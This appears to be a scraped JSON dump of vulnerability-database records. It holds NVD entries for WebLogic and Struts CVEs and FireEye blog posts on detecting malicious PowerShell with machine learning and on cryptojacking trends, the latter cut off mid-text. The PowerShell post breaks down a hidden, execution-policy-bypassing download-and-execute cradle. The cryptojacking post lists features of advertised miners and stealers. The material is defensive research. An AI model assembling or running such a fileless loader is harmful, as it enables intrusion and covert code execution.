"PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": 
["cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:22:23", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "cve", "title": "CVE-2017-5638", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-02-24T12:15:00", "cpe": ["cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.24.3", 
"cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.5.1", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T15:47:57", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T19:29:00", "type": "cve", "title": "CVE-2019-2725", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-27T16:39:00", 
"cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:storagetek_tape_analytics_sw_tool:2.3", "cpe:/a:oracle:vm_virtualbox:5.2.36", "cpe:/a:oracle:communications_converged_application_server:7.0", "cpe:/a:oracle:tape_virtual_storage_manager_gui:6.2", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:communications_converged_application_server:7.1", "cpe:/a:oracle:tape_library_acsls:8.5", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.57", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.56", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:communications_converged_application_server:5.1"], "id": "CVE-2019-2725", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:communications_converged_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:5.2.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_virtual_storage_manager_gui:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*"]}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### 
Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. 
In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). 
It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. 
The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. 
In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. 
\n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. 
In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": 
"FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. 
In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. 
Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are infeasible to reveal through blockchain analysis, ensuring that Monero transactions cannot be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses a \"memory-hard\" hashing algorithm called CryptoNight which, unlike Bitcoin's SHA-256 algorithm, deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-source tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n| XMR Mining Utilities |\n|---|\n| XMR-STACK |\n| MINERGATE |\n| XMRMINER |\n| CCMINER |\n| XMRIG |\n| CLAYMORE |\n| SGMINER |\n| CAST XMR |\n| LUKMINER |\n| CPUMINER-MULTI |\n\nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. 
Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. 
The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. 
